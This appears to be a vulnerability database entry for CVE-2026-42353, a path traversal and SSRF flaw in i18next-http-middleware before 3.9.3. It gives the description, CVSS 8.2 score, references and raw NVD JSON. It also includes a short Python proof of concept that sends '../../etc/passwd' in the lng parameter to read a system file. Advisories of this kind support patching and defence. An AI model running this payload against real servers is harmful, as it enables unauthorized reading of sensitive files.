CVE-2026-42353

Description

i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal or SSRF. This issue has been patched in version 3.9.3.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

i18next-http-middleware < 3.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_poc(url):
    # Targeting the endpoint handled by i18next-http-middleware
    # Exploiting the 'lng' parameter for path traversal
    target = f"{url}/locales"
    params = {
        "lng": "../../etc/passwd",  # Payload to escape directory
        "ns": "en"
    }
    
    try:
        r = requests.get(target, params=params, timeout=5)
        if r.status_code == 200 and "root:" in r.text:
            print("[+] Vulnerability confirmed! Sensitive file read.")
            return True
        else:
            print("[-] Vulnerability not detected or payload failed.")
    except Exception as e:
        print(f"Error: {e}")
    return False

if __name__ == "__main__":
    check_poc("http://127.0.0.1:3000")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42353
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42353
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42353/
[4] VulDB https://vuldb.com/cve/CVE-2026-42353
[5] https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42353", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:12.197", "lastModified": "2026-05-08T16:16:12.197", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal or SSRF. This issue has been patched in version 3.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m", "source": "[email protected]"}]}}